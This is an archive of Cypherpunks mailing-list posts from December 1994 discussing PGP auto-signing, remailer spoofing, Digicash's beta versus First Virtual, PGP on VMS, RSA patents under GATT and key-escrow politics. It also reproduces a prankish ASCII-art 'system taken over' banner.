- -----END PGP PUBLIC KEY BLOCK----- _______________________________________________________________________________ kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkno, SL-1200 Kafka's home page _______________________________________________________________________________ - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuCy7CoZzwIn1bdtAQGPVQF7BdmQzFQCE3GvRiFWRrfwB10Bwvh9XxEc tKwWorCuX8qmUd8VyajqgHLITJRqPyig =1wO5 -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sat Dec 3 10:18:26 1994 From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu) Date: Sat, 3 Dec 94 10:18:26 PST Subject: Info about Linux Message-ID: <199412031823.NAA08121@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Michael D. Crawford writes: > You can get Linux books and CDROM's from the Computer Literacy bookstore on > North First Street in San Jose, and Powell's technical books in Portland > Oregon. Powell's does mail order, and has a Web page which allows you to > search their inventory for books. They've got lots of crypto books too, > 2600 Magazine and lots of engineering books. I think the URL is > http:technical.powells.portland.or.us. Computer Literacy also claims to ship worldwide, and offers an Internet address (unverified): info at clbooks.com - - -L. McCarthy, merely a satisfied patron of Computer Literacy Bookshops Inc. - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuC2Ymf7YYibNzjpAQHImAQAtjVRIC/P7DbvHc7+Umi/b4dxtpkw64M+ eCBy62nmOhQuKv7H6DXHCi00+648qui2pCV1f9WN8om1Iv9pf7cCjg5QHdNLd5U/ obJrWmrB/XcJq+LzJoqlBQLkw5pxt1mGEBeoeG+bHZAXpeW7AvbH9LRek2k3lagF l544vUc+QPI= =XKzG - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuC3jSoZzwIn1bdtAQEwegF9FDvDahwOWnh0pMJxK1OimynvSHsGWOp8 Bm23ZGqRyvGkPDVR/BscmfQM55G1RmaJ =UYao -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sat Dec 3 10:37:07 1994 From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu) Date: Sat, 3 Dec 94 10:37:07 PST Subject: DETWEILER IS SPOOFING US!!! Message-ID: <199412031842.NAA08292@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Alan Bostick writes: > Thank you, Mr. Anonymous, your comedy has relieved a great deal of the > tension, at least here. If it weren't for LD's successful attacks on the remailer bramble, I might be able to derive some amusement from this. As it is, this stuff just makes my blood boil. If some government agency isn't sponsoring his antics, it certainly should be. I used to be surprisingly willing to keep an open mind and take LD's claims seriously; more than most non-paranoiacs, I think. He had a fair shot to gain my support. Instead, he's made yet another life-long enemy. I hope I'm making myself perfectly clear, LD. I don't despise you because Tim said so, or Eric said so, or because of your criticism of the list. I despise you as a direct result of your own deliberate actions. You've brought this upon yourself. Feel free to slither away now. - - -L. McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuC6dWf7YYibNzjpAQGWLwP/XAE5ZHwOByUrIqA2PbwbW9ZkMMdUMo3i eIIkJQnxOmDP3cp1Pr5eaMywyNACxCfBVs1jU5KXEp1XEcQmTD1ib6vXS28zAzlr SQhh2up2k4pNWr0uK/X6IHD3vVnUlbRkjk+fSE18/BhYRNaS7cELnMbFDQXsdtz/ KpAgGl4SM08= =R/UR - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuC72CoZzwIn1bdtAQH9fAF/deI6ep4aqGK+yraM2fF9qR5+kJ3yMpWu ALPJ/rTioGjezsYx6/y1cotR1gf4SV6B =Pdlu -----END PGP SIGNATURE----- From usura at vox.xs4all.nl Sat Dec 3 10:53:55 1994 From: usura at vox.xs4all.nl (Alex de Joode) Date: Sat, 3 Dec 94 10:53:55 PST Subject: Kudos Message-ID: -----BEGIN PGP SIGNED MESSAGE----- : -----BEGIN PGP SIGNED MESSAGE----- : : Thanks and congratulations to Todd for a job well done with the : CP signing service and Raph for his excellent work with premail. : : An appreciative lurker/learner : : : - --- : [This message has been signed by an auto-signing service. A valid signature : means only that it has been received at the address corresponding to the : signature and forwarded.] : : -----BEGIN PGP SIGNATURE----- : Version: 2.6.2 : Comment: Gratis auto-signing service : : iQBFAwUBLuA9wioZzwIn1bdtAQFXnwGAitqcooxfEeABifXLhmxmRAQKlM90Gm6K : Y2vmZi3kjSYWpDMYQNkID+HXYTeps30Q : =oN3X : -----END PGP SIGNATURE----- I did not write the above message; it was probably sent using my remailer which is installed at usura at xs4all.nl. Todd, could you let the software use the from line and not the sender/originator line, or whatever caused this error? From: usura at xs1.xs4all.nl Message-ID: <199412030943.EAA04190 at bb.hks.net> Thanks, -----BEGIN PGP SIGNATURE----- Version: 2.6.2. iQCVAgUBLuC64lnfdBSNVpE9AQGKVwQAlvNVdoFFYD3MLvyqOLQrTkd3hJBXqskf fVlX4ng9fJN5vL9B8BpaKQlg0z7uy9kywTkAmXMS/7cOe/IuVBsvmRt2hP1TVCwW i3LSSqZyg9arRFRpw2Yx77/RwWGQPyYRt7uD75YdBfrc152u7PKVIHouXNBTA2Uj YhayLgJ0pWE= =soLT -----END PGP SIGNATURE----- -- Exit! Stage Left. 
Alex de Joode From usura at vox.xs4all.nl Sat Dec 3 10:54:57 1994 From: usura at vox.xs4all.nl (Alex de Joode) Date: Sat, 3 Dec 94 10:54:57 PST Subject: ecash trial issues explained Message-ID: -----BEGIN PGP SIGNED MESSAGE----- bigmac at digicash.com (Marcel van der Peijl) writes: : : Last time I checked (a week ago, I am currently on the road) there : well over 500 or 600 active ecash accounts. But there are another : 1000 accounts waiting, and new requests coming in between 10 and 100 : per day. [..] : Because we can not support a 24 hour staff and we want : to keep response time low, people in time zones close to ours (GMT+1) : have been issued accounts first. At the moment we are confident we can : scale up the trial. I promise you it will not be several more months : before everyone can join the trial. There is a sort of (limited) Freenet system in Holland called DDS, people can request an account, (which usually takes 48 hours), if you - -really- want ECash fast, get a Dutch-English dictionary and type: telnet dds.nl EnJoY Alex -----BEGIN PGP SIGNATURE----- Version: 2.6.2. iQCVAgUBLuC8bVnfdBSNVpE9AQFneAQAr2hdWpmiK4jmw2c1NO/miL46OincgRpp KE39FZzCCx9z0+2EWiFj2i7v6A9zfzDk4OQ94fKCA/jypFMBv6fCf/Sar/4cymcf zU5PDgwyxQHBk9RPVMG2M0o1mMKEDINfq3amfpw2UQz99gqzzRhLsqmyk3Z2rM+E flDSfK5RIIE= =gd6r -----END PGP SIGNATURE----- -- Exit! Stage Left. Alex de Joode From turner at telecheck.com Sat Dec 3 10:57:48 1994 From: turner at telecheck.com (Joe Turner) Date: Sat, 3 Dec 94 10:57:48 PST Subject: PGP on a VAX In-Reply-To: <199412030109.UAA07622@phobos.lib.iup.edu> Message-ID: <9412031858.AA22953@TeleCheck.com> > > -----BEGIN PGP SIGNED MESSAGE----- > > I was wondering what the status of getting PGP compiled on a VAX was. > The academic machine here is a VAX 6540 running VMS 5.5-1. > Of course I avoid it, but I want to spread the good word amongst > the IUP student users. Any place I can get documentation? 
> > > - ----- > Doc "I used to think that my brain was the > rogaski at phobos.lib.iup.edu best part of my body ... but then I > http://www.lib.iup.edu/~rogaski/ remembered who was telling me this." > 100,000 lemmings can't be wrong! - Emo Phillips > > finger fllevta at oak.grove.iup.edu for PGP Public Key > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLt/FJR0c4/pqJauBAQExfQP/Z1EhLyYw449tTTjYrNNlLRdLA9sA2V+o > rpYUgKc0o8yGfEVkERhMH5F40IawXfXkcmVp9Zk+AV8Z7GP2YYpIT8pbFuGSYAYZ > HuZXUmYgfmGkzM9uyxV82TyTjh9hQ4Hv7ijwWIPOeROV552WJZYzamJqeBfdi/80 > xR13UjkjZs4= > =CA+0 > -----END PGP SIGNATURE----- > According to Jeff at ViaCrypt, they have yet to start working on an "official" version of PGP on the VAX. However, if you get the source code you will no doubt see the MMS and VAX assembly language files (*.MAR). I attempted to get it to compile but couldn't. You are going to have to edit the files to add a few header files, even with the MMS file. I was toying with the idea of starting to work on a port to OpenVMS so it will run on an alpha, but there are some issues regarding commercial usage that I'm somewhat leery of (I use this account almost solely as a personal account, yet the company pays for it...). I've even stopped using PGP several months ago for personal use until I can scrape up enough money for a real-live-registered-professional copy. Does anyone have any input as to ViaCrypt's Windows PGP application? Is this any good? If you need any help, send me e-mail I'll be happy to do this for you. I guess compiling code for someone else won't violate the license restrictions. -- Joe N. Turner Telecheck International turner at telecheck.com 5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659 compu$erv: 73301,1654 (800) 888-4922 * (713) 439-6597 From warlord at MIT.EDU Sat Dec 3 11:04:06 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sat, 3 Dec 94 11:04:06 PST Subject: pgp / passphrase / capture / yikes! 
In-Reply-To: <199412021900.LAA29951@jobe.shell.portal.com> Message-ID: <9412031903.AA07455@toxicwaste.media.mit.edu> > just wondering , if i use pgp on my pc , and lets say while on my unix > connection to the net i shell to dos to do encryption or decryption , does > this compromise my security in any way ? can some admin catch my > passphrase, i don't think so , but i'm really fucken paranoid ! thanks for > any answers fellow punks ! If you are dialed-up to a UNIX box using some terminal emulator, say kermit, and you escape back to the local machine shell-escape to run PGP, the SysAdmin on the UNIX side should not be able to read what you say. -derek From owner-cypherpunks at hks.net Sat Dec 3 11:46:38 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Sat, 3 Dec 94 11:46:38 PST Subject: Kudos Message-ID: <199412031951.OAA08969@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Alex de Joode wrote: >I did not write the above message; it was probably sent using my >remailer which is installed at usura at xs4all.nl. > >Todd, could you let the software use the from line and not the >sender/originator line, or whatever caused this error? Actually, I've been using the "From " line in the UNIX mail file, as it's the "envelope" address. But that's because the system I built on top of was an infobot. I'll change it to just pass the "From: " header along from the input. Sorry 'bout that. -- Todd - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuDMNyoZzwIn1bdtAQFkTwGAo2NiQbARWrJHrbfFalQl+reXwgi7KAEK u7IJxm3aLxC+ZsYfDIo8DOupp/kPakLl =Av+q -----END PGP SIGNATURE----- From rishab at dxm.ernet.in Sat Dec 3 11:49:15 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 3 Dec 94 11:49:15 PST Subject: Netscape RSA Message-ID: Tim May wrote: > Also, Netscape the company (formerly Mosaic Communications) is seeking > to hire someone to [get it working with PGP]. Actually, Netscape is going to do something like S-Mosaic + S-HTTP (used in CommerceNet) - not PGP but built-in RSA digisigs and encryption (US only of course). ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Sat Dec 3 11:49:15 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 3 Dec 94 11:49:15 PST Subject: GATT and RSA Message-ID: grendel at netaxs.com: > Anyone know how GATT would affect this, if passed? ABC News ran a > short blurb a few nights ago about how it contained intellectual property > provisions, and that patents would be honored worldwide. (?) What effect > would this have on the distribution of PGP, and other software that uses > RSAREF? GATT doesn't say that the world has to adopt US patent laws. It insists on the acceptance of certain categories of biotech and pharmaceutical patents, but not algorithms or software. Nor does registering a global patent become significantly easier - you still have to file (and pay for) patents in each country you want to 'work' it. Filing first in PCT (Patent Cooperation Treaty) signatories makes the process somewhat cheaper, that's all. So GATT is unlikely to affect RSA. 
----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From alex at omaha.com Sat Dec 3 11:53:03 1994 From: alex at omaha.com (Alex Strasheim) Date: Sat, 3 Dec 94 11:53:03 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412031939.NAA01510@omaha.omaha.com> Message-ID: <199412031953.NAA01538@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- > The facts of the matter is that First Virtual currently provides a net > benefit by moving real value (e.g. dollars) around, and Digicash does > not. Until the Digicash system can move real value, there is no > reason to use it. I think I'm missing something here. Isn't the Digicash system in a beta-phase? At this point, aren't they just trying to work out the kinks and show people that it works? Obviously, a system that hasn't been deployed isn't as useful as one that has. The question is, once Digicash is released for real, how will it compare to FV? I don't have any Digicash software yet, but I'm very interested in it, and I wonder if anyone else feels that a Digicash beta testers mail list would be a good thing. I'd like to hear what you guys think of it. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. 
public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuDMqxEpP7+baaPtAQFQ0gP+PZzEx6Z6fQiURXCUtnRnxeVZEVweZ4K3 fLRhvC8nizTdQKPqMQcGQzd/jRqV1zLiPuEKwTLTsz9onEqwaDF7t1sg5DCbqlXj KrYTfKXxOyCDY+knc2Bv72TxLcO0V2Rk07McgDfufLel+GUrdCXA4zHc/nTdktKV KgbF5+Nse/k= =WyDJ -----END PGP SIGNATURE----- From owner-cypherpunks at hks.net Sat Dec 3 11:55:47 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Sat, 3 Dec 94 11:55:47 PST Subject: Cypherpunks@hks.net service Message-ID: <199412032000.PAA09107@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412031706.MAA07494 at bb.hks.net>, wrote: >The point is that if Eric insists on arbitrary rules that >threaten the list, some bright c'punk will "write code" to circumvent >the asinine rule. Use technology to solve problems... Not exactly; that's how the thought train began, but something that was just for circumventing the rule would have a slightly different solution: generate a new key for each post, sign with the key, and throw it away (so that no information would be contained in the signature). The signatures from the current system do contain some information. I might yet still implement something that does the above: at this point, it's pretty trivial, aside from hacking PGP to generate a key with a smaller than 384-bit modulus (to conserve computrons). As an aside, this is my general approach to things: I'll start off in a particular direction and then vary it as I think of new things. I only mention it here because I often state that I'm going to do something and then the result is somewhat different than my original summary. I've done this a couple times here, and I'm hoping that explaining this will make me appear, well, less flakey. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." 
- B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuDOUioZzwIn1bdtAQGbjQF/R5vX8/XFc495w2V6xC6IhnPgR6hjGPh1 gxDqr/CM32axC7YJUmoaZOnHbnNvcvBs =L96u -----END PGP SIGNATURE----- From owner-cypherpunks at hks.net Sat Dec 3 12:04:58 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Sat, 3 Dec 94 12:04:58 PST Subject: Disclaimer within signed body? Message-ID: <199412032009.PAA09215@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412031833.KAA17387 at largo.remailer.net>, Eric Hughes wrote: >Now as far as aesthetics, this has got a lot of screenjunk in it. It >does, however, represent exactly what is going on in a way that the >right kind of MIME capable reader can make exact use of. > >I'm not advocating this. I do think, though, that a minimal solution >to all the criteria at once looks a lot like this. Somewhat, yes. As the aesthetics are important to me (which is why I avoid MIME as a rule), I'll avoid doing a MIME-compliant solution until MIME is integrated better with MUAs. Which in practice means that until it's part of emacs/vm, since that's what I use. I'm not currently concerned that the separation be computer-parsable, as long as it's human-parsable. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuDQgCoZzwIn1bdtAQF7ogGAtHI2XwHHZLKO3JqFwcGU3C9Uhjrgfd4j vS4DcKwlV/Ansmc2Z19IGwBQZpz6yctD =hcR5 -----END PGP SIGNATURE----- From alex at omaha.com Sat Dec 3 12:21:21 1994 From: alex at omaha.com (Alex Strasheim) Date: Sat, 3 Dec 94 12:21:21 PST Subject: www-buyinfo list Message-ID: <199412032022.OAA01633@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- I'm sorry to broadcast this to the entire list, but I haven't been able to find the answer another way. Does anyone know how I can join the www-buyinfo list? == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuDTWBEpP7+baaPtAQHD2wP/XkgIbQdRvGmzphunIxo3QH4Ai5SmO5Ts ShPSU81D0/APaluL9Mjjbx4u9ZHrOfaa458nyL8JnSoTP09EERMl6IdXoZvn4SVr QuIVg+pjehn4fgJe9ZCDHJoQcOIVYIFyFixbryNJPpkC2mEEVb5dtOu9F54o8IBW q5XhqktmiBQ= =AB4O -----END PGP SIGNATURE----- From wfgodot at vespucci.iquest.com Sat Dec 3 12:50:08 1994 From: wfgodot at vespucci.iquest.com (Michael Pierson) Date: Sat, 3 Dec 94 12:50:08 PST Subject: Cypherpunk Commitment? [Was: We are ALL guests (except Eric)] Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Eric Hughes wrote: > ... It's comfortable to write manifestos, express your position, > be indignant at the government, and teach privacy. We generally live > in free societies where there is little recourse taken against speech. > It is much less comfortable to use tortious cryptography, run a > remailer, finesse export controls, and deploy code. Far and away the > most extreme reactions have come from what people did and not from > what they said. Speech affects the world, but action affects it more, > because every word that affects the world only through a sequence of > body motions. Cypherpunks get listened to not because we talk a lot; > that's insufficient. Cypherpunks get listened to because we do > things. 
I think you make a cogent point here. I agree that it is insufficient for cypherpunks to merely pay lip service to their ideals if they wish to see them prevail. Especially when those who want to build a Surveillance State Infrastructure into the National Information Infrastructure are busy writing legislation, cultivating their media assets, and cutting back room deals. I believe that John Philpot Curran's 18th century assertion that "It is the common fate of the indolent to see their rights become prey to the active." is true for cypherpunks today. The proponents of government mandated key escrow are certainly "doing something", and in the absence of an active and coordinated opposition, I think they will get their way, and that troubles me deeply. I doubt that they will wait long for the widespread use of seamlessly integrated OLE, OpenDoc compliant crypto tools to become a reality before they make their move. If these tools should arrive and come into widespread use in time to make a difference, it will be because the developers of these tools and those advocating their use were driven to take action by an awareness of the urgent sociopolitical imperatives involved, not the economic ones. I think most of us here appreciate what an insidiously malignant menace government mandated key escrow represents to the survival of our right to privacy and our liberty in general, both now, and even more so in the pervasively networked world we will inhabit in the 21st century. It is my deep conviction that the battle now brewing over the right of the people to freely use cryptography is of the most crucial consequence for the freedom that we, and our children, and our grandchildren will have in the next century and beyond. And it is a battle that will be lost if we don't commit our _deeds_ as well as our words to the struggle. This is a cause worth "doing something" about. This is a cause worth making sacrifices for. 
I thought cypherpunks were supposed to be part of the vanguard. If not us who? The unencumbered freedom to use cryptography to preserve our privacy will not prevail on its own; the forces arrayed against it are powerful and determined. If it prevails, it will be because we fought with greater determination, intelligence, and commitment, and were diligent in enlisting allies to our cause by convincing them it was a righteous one. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuCMnNGJlWF+GPx9AQEtFAQAyJDnJxlk9LcWZl0tjYdMQFs4jI5jPCJr yWBF6y0s4AONotRiwFg8E8leWLHTLKuZvTn92gBNXNC+CMWDn6XZjSuoJbygqmnJ xykHhezOHnn2GcFcSflduLSbBLj76Rpt8odR7uNJ6vDGO8kNRHi0rvV+siGMzKfD 90MfPW2r9sY= =k1vi -----END PGP SIGNATURE----- From eric at remailer.net Sat Dec 3 14:21:11 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 3 Dec 94 14:21:11 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412031953.NAA01538@omaha.omaha.com> Message-ID: <199412032319.PAA17722@largo.remailer.net> From: Alex Strasheim > Until the Digicash system can move real value, there is no > reason to use it. I think I'm missing something here. Isn't the Digicash system in a beta-phase? At this point, aren't they just trying to work out the kinks and show people that it works? Yes, it is granted that Digicash is in beta, and not polished. But beta testing usually happens after all significant functionality is present. The Digicash beta isn't moving real money, and that's a significant functional deficit. Obviously, a system that hasn't been deployed isn't as useful as one that has. This is substantially my point. DC and FV are not directly comparable, because one does something directly useful and the other doesn't. The question is, once Digicash is released for real, how will it compare to FV? Who can say? It hasn't been released for real. Clearing and settlement in a payments system are _most_ of the problem, not sugar coating. 
FV is leveraging Visa for settlement, but Digicash currently has nothing. Eric From nowhere at bsu-cs.bsu.edu Sat Dec 3 15:22:53 1994 From: nowhere at bsu-cs.bsu.edu (Anonymous) Date: Sat, 3 Dec 94 15:22:53 PST Subject: No Subject Message-ID: <199412032322.SAA02084@bsu-cs.bsu.edu> Has anyone seen this before: 0h n0!@# Y0r SySteM hAz bEeN TAkeN 0veR bY k0mUTeR P1rAteS!@# _._ Y0 h0 h0 aNNa b0ttLe 0f rUm!@# / \ _____________ __/ L0CK! \__ / \ Avast, Ya SkUrvEE d0g!@# (_____________)| Arrr! I'm a | Yav bEEn b0ArDeD by tHe |\___// | | Pirate! | M0st r00tenEst, t00t1nezT | ||| O | / \_____________/ C0mpUtEr p1rAteZ tHat evER \ v / / d1D sAle thE s1l1k0n seA!@# \"/ Hay Sk0Tt!@ " H0wZ j1m d01ng?!?@# L egion ________________ 0 f LaRrY L0Ck |L0CK's G0al aNd | C 0dE SeZ: | Misshun!@#: | K ydz \||// /~~~~~~~\ |________________| [tHeSE / ! Oo | Ptttht! | | 2 B s0 El1tE | KarAkturz ---{ @ ()^() /\_______/ | ThAt 0ur HedZ | d0n't MeaN Sh1t.] \ # (U) | X-PL0De!@#$ | |________________| "Man...we're so lame, it hurts..." Th1z M0TD 1z MuCh beTTeR thAn tHe oNe thAt wAz up heRe B 4!@# GirLiee Usurz!? WaReZ the G1rl1e uZurz!? From jrochkin at cs.oberlin.edu Sat Dec 3 15:39:49 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sat, 3 Dec 94 15:39:49 PST Subject: Brands excluded from digicash beta Message-ID: At 6:19 PM 12/03/94, Eric Hughes wrote: > From: Alex Strasheim > > > Until the Digicash system can move real value, there is no > > reason to use it. > > I think I'm missing something here. Isn't the Digicash system in a > beta-phase? At this point, aren't they just trying to work out the kinks > and show people that it works? > >Yes, it is granted that Digicash is in beta, and not polished. But >beta testing usually happens after all significant functionality is >present. The Digicash beta isn't moving real money, and that's a >significant functional deficit. Huh? Beta testing occurs after significant functionality in the _software_ is present. 
The current digi-cash software, as I understand it, would work fine in a real-cash situation. You would just need to pay for your ecash. Yeah, a system would need to be set up to deal with fraud and such, that might not be there right now. But that system is at an entirely different level than the digicash software, neither vendors nor buyers would have to deal with it. The fact that real money isn't being moved isn't a significant functional deficit in the digicash software, it's got nothing to do with the digicash software.

It would be stupid to beta the software with real money, because then if something doesn't work right, people will lose real money. You want to make sure that the software works pretty much flawlessly, so people don't lose real money once the system is being used for real money. And to do that, you release the beta software without real money. That makes perfect sense to me. Later, I'm sure, there will be a beta test using real money, once the software is completely finished.

From anonymous-remailer at xs4all.nl Sat Dec 3 16:07:34 1994
From: anonymous-remailer at xs4all.nl (Name withheld on request)
Date: Sat, 3 Dec 94 16:07:34 PST
Subject: pirate picture
Message-ID: <199412040009.AA20579@xs1.xs4all.nl>

Damn, those philosophy department doctoral candidates from Columbia are at it again.

> Has anyone seen this before:
>
>
>
> 0h n0!@# Y0r SySteM hAz bEeN
> TAkeN 0veR bY k0mUTeR P1rAteS!@#
> _._ Y0 h0 h0 aNNa b0ttLe 0f rUm!@#
> / \ _____________
> __/ L0CK! \__ / \ Avast, Ya SkUrvEE d0g!@#
> (_____________)| Arrr! I'm a | Yav bEEn b0ArDeD by tHe
> |\___// | | Pirate! | M0st r00tenEst, t00t1nezT
> | ||| O | / \_____________/ C0mpUtEr p1rAteZ tHat evER
> \ v / / d1D sAle thE s1l1k0n seA!@#
> \"/ Hay Sk0Tt!@
> " H0wZ j1m d01ng?!?@# L egion
> ________________ 0 f LaRrY L0Ck
> |L0CK's G0al aNd | C 0dE SeZ:
> | Misshun!@#: | K ydz \||// /~~~~~~~\
> |________________| [tHeSE / ! Oo | Ptttht!
| > | 2 B s0 El1tE | KarAkturz ---{ @ ()^() /\_______/ > | ThAt 0ur HedZ | d0n't MeaN Sh1t.] \ # (U) > | X-PL0De!@#$ | > |________________| "Man...we're so lame, it hurts..." > > Th1z M0TD 1z MuCh beTTeR thAn tHe oNe thAt wAz up heRe B 4!@# > > GirLiee Usurz!? WaReZ the G1rl1e uZurz!? From matthewn at uiuc.edu Sat Dec 3 16:10:49 1994 From: matthewn at uiuc.edu (TheElusiveMatthew) Date: Sat, 3 Dec 94 16:10:49 PST Subject: How do *I* use PGP? In-Reply-To: Message-ID: On Sat, 3 Dec 1994, Bob Snyder wrote: > At 5:30 PM 12/1/94, TheElusiveMatthew wrote: > > >My internet access is through a personal account provided by my employer. > >It is on a machine used exclusively by employees of the University of > >Illinois (no student accounts). > > What kind of machine is it? How do you read mail? A PC mail reader? I read my mail with pine on my account. I think the login excerpt below answers your other question. ----------------- UofI CCSO - Sequent S81 (ux1.cso.uiuc.edu - ttyt9) 4.2+ BSD/5.3 UNIX - Dynix 3.1.2 ----------------- TheElusiveMatthew From usura at xs4all.nl Sat Dec 3 16:12:25 1994 From: usura at xs4all.nl (Alex de Joode) Date: Sat, 3 Dec 94 16:12:25 PST Subject: ecash trial issues explained Message-ID: <199412040013.AA21097@xs1.xs4all.nl> : There is a sort of (limited) Freenet system in Holland called DDS, : people can request an account, (wich usually takes 48 hours), if youre : - -really- want ECash fast, get an Dutch-English dictionary and type: : telnet dds.nl : You will then have a WWW-like page: choose * dutch (english translation) (position) * ga de stad binnen (enter the city) (1) * aanmelden als DDS bewoner (apply for account) (14) voornaam (first name) achternaam (last name) adres (adress) postcode (zipcode) stad (city) land (county) (just backspace NEDERLAND) tel overdag (day time telephone) tel 's avonds (evening telephone) (ie 020-6 555 123) toegangsnaam (login) (max 8 characters) password (password) Then choose "lever aanvraag in" (submit) and in 
approx 48 hours you'll have a Dutch -same timezone as DigiCash- account.

One of the limitations of the DDS is that mail only can be sent to addresses that are in the .nl domain, so you cannot forward your mail.

For reading your mail choose:

* ga de stad binnen (enter the city)
* postkantoor (postoffice)
* lees/schrijf email {Pine} (use email facilities)

in Pine choose "L postvakken" and then "Inkomend" (incoming)

The status line of Pine has been translated into Dutch:

? help   | M hoofd |P vorig |- vorg bl  |d verwijd |r antw
O overig | V bekijk|N volge |spc volg bl|u herstel |f doors

? help   | M main  |P prev  |- last page |d delete |r reply
O other  | V View  |N next  |spc next pag|u undelet|f forward

Hope this helps, if you have any problems/questions please email me.

--
Exit! Stage Left.
Alex de Joode

From speed at cs.washington.edu Sat Dec 3 16:38:27 1994
From: speed at cs.washington.edu (Erik Selberg)
Date: Sat, 3 Dec 94 16:38:27 PST
Subject: free nntp servers
Message-ID: <199412040038.QAA20835@meitner.cs.washington.edu>

(apologies if this is as inciteful to asking for ftp servers on alt.sex)

Are there any good free nntp servers (preferably US) that carry most/all of the alt groups and some of the regional (ba, pa) groups as well?

Thanks,
-Erik

work: (206) 543-7798    Erik Selberg
play: (206) 517-3039    speed at cs.washington.edu
I get by with a little help from my friends...

From rfb at lehman.com Sat Dec 3 18:11:33 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Sat, 3 Dec 94 18:11:33 PST
Subject: Mighty morphing power cypherpunks
In-Reply-To: <199412030113.RAA27075@netcom8.netcom.com>
Message-ID: <9412040211.AA02600@cfdevx1.lehman.com>

    From: jamesd at netcom.com (James A. Donald)
    Date: Fri, 2 Dec 1994 17:13:28 -0800 (PST)

    My point was that if some of the autonag messages go astray,
    or are deliberately misled, who cares?

I suspect that LD would love to play around with this feature.
